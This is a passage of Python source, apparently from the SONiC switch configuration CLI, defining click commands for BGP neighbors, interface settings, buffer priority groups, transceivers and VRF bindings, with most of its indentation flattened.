for ipaddress in bgp_neighbor_ip_list:
_change_bgp_session_status_by_addr(config_db, ipaddress, 'up', verbose)
# 'neighbor' subcommand
@startup.command()
@click.argument('ipaddr_or_hostname', metavar='<ipaddr_or_hostname>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def neighbor(ipaddr_or_hostname, verbose):
    """Start up BGP session by neighbor IP address or hostname.
       User can specify either internal or external BGP neighbor to start up
    """
    log.log_info("'bgp startup neighbor {}' executing...".format(ipaddr_or_hostname))
namespaces = [DEFAULT_NAMESPACE]
found_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
    # namespaces (in case of multi ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _change_bgp_session_status(config_db, ipaddr_or_hostname, 'up', verbose):
found_neighbor = True
if not found_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(ipaddr_or_hostname))
#
# 'remove' subgroup ('config bgp remove ...')
#
@bgp.group(cls=clicommon.AbbreviationGroup)
def remove():
"Remove BGP neighbor configuration from the device"
pass
@remove.command('neighbor')
@click.argument('neighbor_ip_or_hostname', metavar='<neighbor_ip_or_hostname>', required=True)
def remove_neighbor(neighbor_ip_or_hostname):
    """Delete BGP neighbor configuration for the given hostname or IP address from the device.
User can specify either internal or external BGP neighbor to remove
"""
namespaces = [DEFAULT_NAMESPACE]
removed_neighbor = False
if multi_asic.is_multi_asic():
ns_list = multi_asic.get_all_namespaces()
namespaces = ns_list['front_ns'] + ns_list['back_ns']
# Connect to CONFIG_DB in linux host (in case of single ASIC) or CONFIG_DB in all the
    # namespaces (in case of multi ASIC) and do the specified "action" on the BGP neighbor(s)
for namespace in namespaces:
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=namespace)
config_db.connect()
if _remove_bgp_neighbor_config(config_db, neighbor_ip_or_hostname):
removed_neighbor = True
if not removed_neighbor:
click.get_current_context().fail("Could not locate neighbor '{}'".format(neighbor_ip_or_hostname))
#
# 'interface' group ('config interface ...')
#
@config.group(cls=clicommon.AbbreviationGroup)
# TODO: add "hidden=True" if this is a single ASIC platform, once we have click 7.0 in all branches.
@click.option('-n', '--namespace', help='Namespace name',
required=True if multi_asic.is_multi_asic() else False, type=click.Choice(multi_asic.get_namespace_list()))
@click.pass_context
def interface(ctx, namespace):
"""Interface-related configuration tasks"""
# Set namespace to default_namespace if it is None.
if namespace is None:
namespace = DEFAULT_NAMESPACE
config_db = ConfigDBConnector(use_unix_socket_path=True, namespace=str(namespace))
config_db.connect()
ctx.obj = {'config_db': config_db, 'namespace': str(namespace)}
#
# 'startup' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def startup(ctx, interface_name):
"""Start up interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
log.log_info("'interface startup {}' executing...".format(interface_name))
port_dict = config_db.get_table('PORT')
for port_name in port_dict:
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "up"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list:
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "up"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list:
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "up"})
#
# 'shutdown' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def shutdown(ctx, interface_name):
"""Shut down interface"""
log.log_info("'interface shutdown {}' executing...".format(interface_name))
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
intf_fs = parse_interface_in_filter(interface_name)
if len(intf_fs) > 1 and multi_asic.is_multi_asic():
ctx.fail("Interface range not supported in multi-asic platforms !!")
if len(intf_fs) == 1 and interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
port_dict = config_db.get_table('PORT')
for port_name in port_dict:
if port_name in intf_fs:
config_db.mod_entry("PORT", port_name, {"admin_status": "down"})
portchannel_list = config_db.get_table("PORTCHANNEL")
for po_name in portchannel_list:
if po_name in intf_fs:
config_db.mod_entry("PORTCHANNEL", po_name, {"admin_status": "down"})
subport_list = config_db.get_table("VLAN_SUB_INTERFACE")
for sp_name in subport_list:
if sp_name in intf_fs:
config_db.mod_entry("VLAN_SUB_INTERFACE", sp_name, {"admin_status": "down"})
#
# 'speed' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_speed', metavar='<interface_speed>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def speed(ctx, interface_name, interface_speed, verbose):
"""Set interface speed"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
log.log_info("'interface speed {} {}' executing...".format(interface_name, interface_speed))
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -s {}".format(interface_name, interface_speed)
else:
command = "portconfig -p {} -s {} -n {}".format(interface_name, interface_speed, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'breakout' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('mode', required=True, type=click.STRING, autocompletion=_get_breakout_options)
@click.option('-f', '--force-remove-dependencies', is_flag=True, help='Clear all dependencies internally first.')
@click.option('-l', '--load-predefined-config', is_flag=True, help='Load predefined user configuration (alias, lanes, speed etc.) first.')
@click.option('-y', '--yes', is_flag=True, callback=_abort_if_false, expose_value=False, prompt='Do you want to Breakout the port, continue?')
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
@click.pass_context
def breakout(ctx, interface_name, mode, verbose, force_remove_dependencies, load_predefined_config):
""" Set interface breakout mode """
breakout_cfg_file = device_info.get_path_to_port_config_file()
if not os.path.isfile(breakout_cfg_file) or not breakout_cfg_file.endswith('.json'):
click.secho("[ERROR] Breakout feature is not available without platform.json file", fg='red')
raise click.Abort()
# Get the config_db connector
config_db = ctx.obj['config_db']
target_brkout_mode = mode
# Get current breakout mode
cur_brkout_dict = config_db.get_table('BREAKOUT_CFG')
cur_brkout_mode = cur_brkout_dict[interface_name]["brkout_mode"]
# Validate Interface and Breakout mode
if not _validate_interface_mode(ctx, breakout_cfg_file, interface_name, mode, cur_brkout_mode):
raise click.Abort()
""" Interface Deletion Logic """
# Get list of interfaces to be deleted
del_ports = get_child_ports(interface_name, cur_brkout_mode, breakout_cfg_file)
del_intf_dict = {intf: del_ports[intf]["speed"] for intf in del_ports}
    if del_intf_dict:
        """ Shut down all the interfaces before deletion """
ret = shutdown_interfaces(ctx, del_intf_dict)
if not ret:
raise click.Abort()
click.echo("\nPorts to be deleted : \n {}".format(json.dumps(del_intf_dict, indent=4)))
else:
        click.secho("[ERROR] del_intf_dict is None! There are no interfaces to be deleted", fg='red')
raise click.Abort()
""" Interface Addition Logic """
# Get list of interfaces to be added
add_ports = get_child_ports(interface_name, target_brkout_mode, breakout_cfg_file)
add_intf_dict = {intf: add_ports[intf]["speed"] for intf in add_ports}
if add_intf_dict:
click.echo("Ports to be added : \n {}".format(json.dumps(add_intf_dict, indent=4)))
else:
click.secho("[ERROR] port_dict is None!", fg='red')
        raise click.Abort()
    """ Special Case: Don't delete those ports where the current mode and speed of the parent port
        remain unchanged, to limit the traffic impact """
click.secho("\nAfter running Logic to limit the impact", fg="cyan", underline=True)
matched_items = [intf for intf in del_intf_dict if intf in add_intf_dict and del_intf_dict[intf] == add_intf_dict[intf]]
# Remove the interface which remains unchanged from both del_intf_dict and add_intf_dict
for item in matched_items:
del_intf_dict.pop(item)
add_intf_dict.pop(item)
    click.secho("\nFinal list of ports to be deleted : \n {} \nFinal list of ports to be added : \n {}".format(json.dumps(del_intf_dict, indent=4), json.dumps(add_intf_dict, indent=4)), fg='green', blink=True)
if not add_intf_dict:
        click.secho("[ERROR] add_intf_dict is None or empty! There are no interfaces to be added", fg='red')
raise click.Abort()
port_dict = {}
for intf in add_intf_dict:
if intf in add_ports:
port_dict[intf] = add_ports[intf]
# writing JSON object
with open('new_port_config.json', 'w') as f:
json.dump(port_dict, f, indent=4)
    # Start interaction with Dynamic Port Breakout config management
try:
""" Load config for the commands which are capable of change in config DB """
cm = load_ConfigMgmt(verbose)
""" Delete all ports if forced else print dependencies using ConfigMgmt API """
final_delPorts = [intf for intf in del_intf_dict]
""" Warn user if tables without yang models exist and have final_delPorts """
breakout_warnUser_extraTables(cm, final_delPorts, confirm=True)
# Create a dictionary containing all the added ports with its capabilities like alias, lanes, speed etc.
portJson = dict(); portJson['PORT'] = port_dict
# breakout_Ports will abort operation on failure, So no need to check return
breakout_Ports(cm, delPorts=final_delPorts, portJson=portJson, force=force_remove_dependencies,
loadDefConfig=load_predefined_config, verbose=verbose)
# Set Current Breakout mode in config DB
brkout_cfg_keys = config_db.get_keys('BREAKOUT_CFG')
if interface_name not in brkout_cfg_keys:
click.secho("[ERROR] {} is not present in 'BREAKOUT_CFG' Table!".format(interface_name), fg='red')
raise click.Abort()
config_db.set_entry("BREAKOUT_CFG", interface_name, {'brkout_mode': target_brkout_mode})
        click.secho("Breakout process for port {} completed successfully."
                    .format(interface_name), fg="cyan", underline=True)
click.echo("Please note loaded setting will be lost after system reboot. To preserve setting, run `config save`.")
except Exception as e:
click.secho("Failed to break out Port. Error: {}".format(str(e)), fg='magenta')
sys.exit(0)
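# Illustrative example of the "limit the impact" filtering above (port names and speeds
# are hypothetical): if the current mode would delete
#   {"Ethernet0": "25000", "Ethernet1": "25000", "Ethernet2": "25000", "Ethernet3": "25000"}
# and the target mode would add
#   {"Ethernet0": "50000", "Ethernet2": "50000"}
# no port appears in both dicts with the same speed, so nothing is filtered out. If the
# target mode instead re-created Ethernet0 at "25000", Ethernet0 would be removed from
# both lists and left untouched to avoid unnecessary traffic impact.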
def _get_all_mgmtinterface_keys():
"""Returns list of strings containing mgmt interface keys
"""
config_db = ConfigDBConnector()
config_db.connect()
return list(config_db.get_table('MGMT_INTERFACE').keys())
def mgmt_ip_restart_services():
"""Restart the required services when mgmt inteface IP address is changed"""
"""
Whenever the eth0 IP address is changed, restart the "interfaces-config"
service which regenerates the /etc/network/interfaces file and restarts
the networking service to make the new/null IP address effective for eth0.
"ntp-config" service should also be restarted based on the new
eth0 IP address since the ntp.conf (generated from ntp.conf.j2) is
made to listen on that particular eth0 IP address or reset it back.
"""
cmd="systemctl restart interfaces-config"
os.system (cmd)
cmd="systemctl restart ntp-config"
os.system (cmd)
#
# 'mtu' subcommand
#
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_mtu', metavar='<interface_mtu>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def mtu(ctx, interface_name, interface_mtu, verbose):
"""Set interface mtu"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
portchannel_member_table = config_db.get_table('PORTCHANNEL_MEMBER')
if interface_is_in_portchannel(portchannel_member_table, interface_name):
ctx.fail("'interface_name' is in portchannel!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -m {}".format(interface_name, interface_mtu)
else:
command = "portconfig -p {} -m {} -n {}".format(interface_name, interface_mtu, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
@interface.command()
@click.pass_context
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('interface_fec', metavar='<interface_fec>', required=True)
@click.option('-v', '--verbose', is_flag=True, help="Enable verbose output")
def fec(ctx, interface_name, interface_fec, verbose):
"""Set interface fec"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if interface_fec not in ["rs", "fc", "none"]:
        ctx.fail("'fec' must be one of ['rs', 'fc', 'none']!")
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
command = "portconfig -p {} -f {}".format(interface_name, interface_fec)
else:
command = "portconfig -p {} -f {} -n {}".format(interface_name, interface_fec, ctx.obj['namespace'])
if verbose:
command += " -vv"
clicommon.run_command(command, display_cmd=verbose)
#
# 'ip' subgroup ('config interface ip ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def ip(ctx):
"""Add or remove IP address"""
pass
#
# 'add' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.argument('gw', metavar='<default gateway IP address>', required=False)
@click.pass_context
def add(ctx, interface_name, ip_addr, gw):
"""Add an IP address towards the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(ip_addr, strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
            # Configuring more than 1 IPv4 or more than 1 IPv6 address fails.
            # Allow only one IPv4 and one IPv6 address to be configured for eth0.
            # If a row already exists, overwrite it (by doing delete and add).
mgmtintf_key_list = _get_all_mgmtinterface_keys()
for key in mgmtintf_key_list:
# For loop runs for max 2 rows, once for IPv4 and once for IPv6.
# No need to capture the exception since the ip_addr is already validated earlier
ip_input = ipaddress.ip_interface(ip_addr)
current_ip = ipaddress.ip_interface(key[1])
if (ip_input.version == current_ip.version):
# If user has configured IPv4/v6 address and the already available row is also IPv4/v6, delete it here.
config_db.set_entry("MGMT_INTERFACE", ("eth0", key[1]), None)
# Set the new row with new value
if not gw:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"NULL": "NULL"})
else:
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), {"gwaddr": gw})
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
interface_entry = config_db.get_entry(table_name, interface_name)
if len(interface_entry) == 0:
if table_name == "VLAN_SUB_INTERFACE":
config_db.set_entry(table_name, interface_name, {"admin_status": "up"})
else:
config_db.set_entry(table_name, interface_name, {"NULL": "NULL"})
config_db.set_entry(table_name, (interface_name, ip_addr), {"NULL": "NULL"})
except ValueError:
ctx.fail("'ip_addr' is not valid.")
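# Illustrative CONFIG_DB rows written by 'config interface ip add' for the management
# interface (addresses and gateway below are examples only):
#   config interface ip add eth0 10.0.0.5/24 10.0.0.1
#     -> MGMT_INTERFACE|eth0|10.0.0.5/24    -> {"gwaddr": "10.0.0.1"}
#   config interface ip add eth0 2001:db8::5/64
#     -> MGMT_INTERFACE|eth0|2001:db8::5/64 -> {"NULL": "NULL"}
# Any existing row of the same address family is removed first, so eth0 keeps at most
# one IPv4 and one IPv6 management address.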
#
# 'del' subcommand
#
@ip.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument("ip_addr", metavar="<ip_addr>", required=True)
@click.pass_context
def remove(ctx, interface_name, ip_addr):
"""Remove an IP address from the interface"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
try:
net = ipaddress.ip_network(ip_addr, strict=False)
if '/' not in ip_addr:
ip_addr = str(net)
if interface_name == 'eth0':
config_db.set_entry("MGMT_INTERFACE", (interface_name, ip_addr), None)
mgmt_ip_restart_services()
return
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
config_db.set_entry(table_name, (interface_name, ip_addr), None)
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
if len(interface_dependent) == 0 and is_interface_bind_to_vrf(config_db, interface_name) is False:
config_db.set_entry(table_name, interface_name, None)
if multi_asic.is_multi_asic():
command = "sudo ip netns exec {} ip neigh flush dev {} {}".format(ctx.obj['namespace'], interface_name, ip_addr)
else:
command = "ip neigh flush dev {} {}".format(interface_name, ip_addr)
clicommon.run_command(command)
except ValueError:
ctx.fail("'ip_addr' is not valid.")
#
# buffer commands and utilities
#
def pgmaps_check_legality(ctx, interface_name, input_pg, is_new_pg):
"""
Tool function to check whether input_pg is legal.
Three checking performed:
1. Whether the input_pg is legal: pgs are in range [0-7]
2. Whether the input_pg overlaps an existing pg in the port
"""
config_db = ctx.obj["config_db"]
try:
lower = int(input_pg[0])
upper = int(input_pg[-1])
if upper < lower or lower < 0 or upper > 7:
ctx.fail("PG {} is not valid.".format(input_pg))
except Exception:
ctx.fail("PG {} is not valid.".format(input_pg))
# Check overlapping.
# To configure a new PG which is overlapping an existing one is not allowed
# For example, to add '5-6' while '3-5' existing is illegal
existing_pgs = config_db.get_table("BUFFER_PG")
if not is_new_pg:
if not (interface_name, input_pg) in existing_pgs.keys():
ctx.fail("PG {} doesn't exist".format(input_pg))
return
for k, v in existing_pgs.items():
port, existing_pg = k
if port == interface_name:
existing_lower = int(existing_pg[0])
existing_upper = int(existing_pg[-1])
if existing_upper < lower or existing_lower > upper:
# new and existing pgs disjoint, legal
pass
else:
ctx.fail("PG {} overlaps with existing PG {}".format(input_pg, existing_pg))
def update_pg(ctx, interface_name, pg_map, override_profile, add = True):
config_db = ctx.obj["config_db"]
# Check whether port is legal
ports = config_db.get_entry("PORT", interface_name)
if not ports:
ctx.fail("Port {} doesn't exist".format(interface_name))
# Check whether pg_map is legal
# Check whether there are other lossless profiles configured on the interface
pgmaps_check_legality(ctx, interface_name, pg_map, add)
# All checking passed
if override_profile:
profile_dict = config_db.get_entry("BUFFER_PROFILE", override_profile)
if not profile_dict:
ctx.fail("Profile {} doesn't exist".format(override_profile))
if 'xoff' not in profile_dict and 'size' in profile_dict:
ctx.fail("Profile {} isn't a lossless profile (no xoff configured)".format(override_profile))
profile_full_name = "[BUFFER_PROFILE|{}]".format(override_profile)
config_db.set_entry("BUFFER_PG", (interface_name, pg_map), {"profile": profile_full_name})
else:
config_db.set_entry("BUFFER_PG", (interface_name, pg_map), {"profile": "NULL"})
adjust_pfc_enable(ctx, interface_name, pg_map, True)
def remove_pg_on_port(ctx, interface_name, pg_map):
config_db = ctx.obj["config_db"]
# Check whether port is legal
ports = config_db.get_entry("PORT", interface_name)
if not ports:
ctx.fail("Port {} doesn't exist".format(interface_name))
# Remove all dynamic lossless PGs on the port
existing_pgs = config_db.get_table("BUFFER_PG")
removed = False
for k, v in existing_pgs.items():
port, existing_pg = k
if port == interface_name and (not pg_map or pg_map == existing_pg):
referenced_profile = v.get('profile')
if referenced_profile and referenced_profile == '[BUFFER_PROFILE|ingress_lossy_profile]':
if pg_map:
ctx.fail("Lossy PG {} can't be removed".format(pg_map))
else:
continue
config_db.set_entry("BUFFER_PG", (interface_name, existing_pg), None)
adjust_pfc_enable(ctx, interface_name, pg_map, False)
removed = True
if not removed:
if pg_map:
ctx.fail("No specified PG {} found on port {}".format(pg_map, interface_name))
else:
ctx.fail("No lossless PG found on port {}".format(interface_name))
def adjust_pfc_enable(ctx, interface_name, pg_map, add):
config_db = ctx.obj["config_db"]
# Fetch the original pfc_enable
qosmap = config_db.get_entry("PORT_QOS_MAP", interface_name)
pfc_enable = qosmap.get("pfc_enable")
pfc_set = set()
if pfc_enable:
for priority in pfc_enable.split(","):
pfc_set.add(int(priority))
if pg_map:
lower_bound = int(pg_map[0])
upper_bound = int(pg_map[-1])
for priority in range(lower_bound, upper_bound + 1):
if add:
pfc_set.add(priority)
elif priority in pfc_set:
pfc_set.remove(priority)
empty_set = set()
pfc_enable = ""
if not pfc_set.issubset(empty_set):
for priority in pfc_set:
pfc_enable += str(priority) + ","
elif not add:
# Remove all
pfc_enable = ""
else:
ctx.fail("Try to add empty priorities")
qosmap["pfc_enable"] = pfc_enable[:-1]
config_db.set_entry("PORT_QOS_MAP", interface_name, qosmap)
#
# 'buffer' subgroup ('config interface buffer ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def buffer(ctx):
"""Set or clear buffer configuration"""
config_db = ctx.obj["config_db"]
if not is_dynamic_buffer_enabled(config_db):
ctx.fail("This command can only be executed on a system with dynamic buffer enabled")
#
# 'priority_group' subgroup ('config interface buffer priority_group ...')
#
@buffer.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def priority_group(ctx):
"""Set or clear buffer configuration"""
pass
#
# 'lossless' subgroup ('config interface buffer priority_group lossless ...')
#
@priority_group.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def lossless(ctx):
"""Set or clear lossless PGs"""
pass
#
# 'add' subcommand
#
@lossless.command('add')
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('pg_map', metavar='<pg_map>', required=True)
@click.argument('override_profile', metavar='<override_profile>', required=False)
@click.pass_context
def add_pg(ctx, interface_name, pg_map, override_profile):
"""Set lossless PGs for the interface"""
update_pg(ctx, interface_name, pg_map, override_profile)
#
# 'set' subcommand
#
@lossless.command('set')
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('pg_map', metavar='<pg_map>', required=True)
@click.argument('override_profile', metavar='<override_profile>', required=False)
@click.pass_context
def set_pg(ctx, interface_name, pg_map, override_profile):
"""Set lossless PGs for the interface"""
update_pg(ctx, interface_name, pg_map, override_profile, False)
#
# 'remove' subcommand
#
@lossless.command('remove')
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('pg_map', metavar='<pg_map>', required=False)
@click.pass_context
def remove_pg(ctx, interface_name, pg_map):
"""Clear lossless PGs for the interface"""
remove_pg_on_port(ctx, interface_name, pg_map)
#
# 'cable_length' subcommand
#
@interface.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('length', metavar='<length>', required=True)
@click.pass_context
def cable_length(ctx, interface_name, length):
"""Set lossless PGs for the interface"""
config_db = ctx.obj["config_db"]
if not is_dynamic_buffer_enabled(config_db):
ctx.fail("This command can only be supported on a system with dynamic buffer enabled")
# Check whether port is legal
ports = config_db.get_entry("PORT", interface_name)
if not ports:
ctx.fail("Port {} doesn't exist".format(interface_name))
try:
assert "m" == length[-1]
except Exception:
ctx.fail("Invalid cable length. Should be in format <num>m, like 300m".format(cable_length))
keys = config_db.get_keys("CABLE_LENGTH")
cable_length_set = {}
cable_length_set[interface_name] = length
config_db.mod_entry("CABLE_LENGTH", keys[0], cable_length_set)
#
# 'transceiver' subgroup ('config interface transceiver ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def transceiver(ctx):
"""SFP transceiver configuration"""
pass
#
# 'lpmode' subcommand ('config interface transceiver lpmode ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('state', metavar='(enable|disable)', type=click.Choice(['enable', 'disable']))
@click.pass_context
def lpmode(ctx, interface_name, state):
"""Enable/disable low-power mode for SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil lpmode {} {}".format("on" if state == "enable" else "off", interface_name)
clicommon.run_command(cmd)
#
# 'reset' subcommand ('config interface transceiver reset ...')
#
@transceiver.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def reset(ctx, interface_name):
"""Reset SFP transceiver module"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
if interface_name_is_valid(config_db, interface_name) is False:
ctx.fail("Interface name is invalid. Please enter a valid interface name!!")
cmd = "sudo sfputil reset {}".format(interface_name)
clicommon.run_command(cmd)
#
# 'vrf' subgroup ('config interface vrf ...')
#
@interface.group(cls=clicommon.AbbreviationGroup)
@click.pass_context
def vrf(ctx):
"""Bind or unbind VRF"""
pass
#
# 'bind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def bind(ctx, interface_name, vrf_name):
"""Bind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("'interface_name' is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is True and \
config_db.get_entry(table_name, interface_name).get('vrf_name') == vrf_name:
return
# Clean ip addresses if interface configured
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
# When config_db deletes an entry and then re-adds an entry with the same key, the DEL notification can be lost.
if ctx.obj['namespace'] is DEFAULT_NAMESPACE:
state_db = SonicV2Connector(use_unix_socket_path=True)
else:
state_db = SonicV2Connector(use_unix_socket_path=True, namespace=ctx.obj['namespace'])
state_db.connect(state_db.STATE_DB, False)
_hash = '{}{}'.format('INTERFACE_TABLE|', interface_name)
while state_db.get_all(state_db.STATE_DB, _hash) is not None:
time.sleep(0.01)
state_db.close(state_db.STATE_DB)
config_db.set_entry(table_name, interface_name, {"vrf_name": vrf_name})
#
# 'unbind' subcommand
#
@vrf.command()
@click.argument('interface_name', metavar='<interface_name>', required=True)
@click.pass_context
def unbind(ctx, interface_name):
"""Unbind the interface to VRF"""
# Get the config_db connector
config_db = ctx.obj['config_db']
if clicommon.get_interface_naming_mode() == "alias":
interface_name = interface_alias_to_name(config_db, interface_name)
if interface_name is None:
ctx.fail("interface is None!")
table_name = get_interface_table_name(interface_name)
if table_name == "":
ctx.fail("'interface_name' is not valid. Valid names [Ethernet/PortChannel/Vlan/Loopback]")
if is_interface_bind_to_vrf(config_db, interface_name) is False:
return
interface_dependent = interface_ipaddr_dependent_on_interface(config_db, interface_name)
for interface_del in interface_dependent:
config_db.set_entry(table_name, interface_del, None)
config_db.set_entry(table_name, interface_name, None)
#
# 'vrf' group ('config vrf ...')
#
@config.group(cls=clicommon.AbbreviationGroup, name='vrf')
@click.pass_context
def vrf(ctx):
"""VRF-related configuration tasks"""
config_db = ConfigDBConnector()
config_db.connect()
ctx.obj = {}
ctx.obj['config_db'] = config_db
@vrf.command('add')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def add_vrf(ctx, vrf_name):
"""Add vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_add_management_vrf(config_db)
else:
config_db.set_entry('VRF', vrf_name, {"NULL": "NULL"})
@vrf.command('del')
@click.argument('vrf_name', metavar='<vrf_name>', required=True)
@click.pass_context
def del_vrf(ctx, vrf_name):
"""Del vrf"""
config_db = ctx.obj['config_db']
if not vrf_name.startswith("Vrf") and not (vrf_name == 'mgmt') and not (vrf_name == 'management'):
ctx.fail("'vrf_name' is not start with Vrf, mgmt or management!")
if len(vrf_name) > 15:
ctx.fail("'vrf_name' is too long!")
if (vrf_name == 'mgmt' or vrf_name == 'management'):
vrf_delete_management_vrf(config_db)
else:
del_interface_bind_to_vrf(config_db, vrf_name)
config_db.set_entry('VRF', vrf_name, None)
@vrf.command('add_vrf_vni_map')
@click.argument('vrfname', metavar='<vrf-name>', required=True, type=str)
@click.argument('vni', metavar='<vni>', required=True)
@click.pass_context
def add_vrf_vni_map(ctx, vrfname, vni):
config_db = ctx.obj['config_db']
found = 0
if vrfname not in config_db.get_table('VRF').keys():
ctx.fail("vrf {} doesnt exists".format(vrfname))
if not vni.isdigit():
ctx.fail("Invalid VNI {}. Only valid VNI is accepted".format(vni))
if clicommon.vni_id_is_valid(int(vni)) is False:
ctx.fail("Invalid VNI {}. Valid range [1 to 16777215].".format(vni))
vxlan_table = config_db.get_table('VXLAN_TUNNEL_MAP')
vxlan_keys = vxlan_table.keys()
if vxlan_keys is not None:
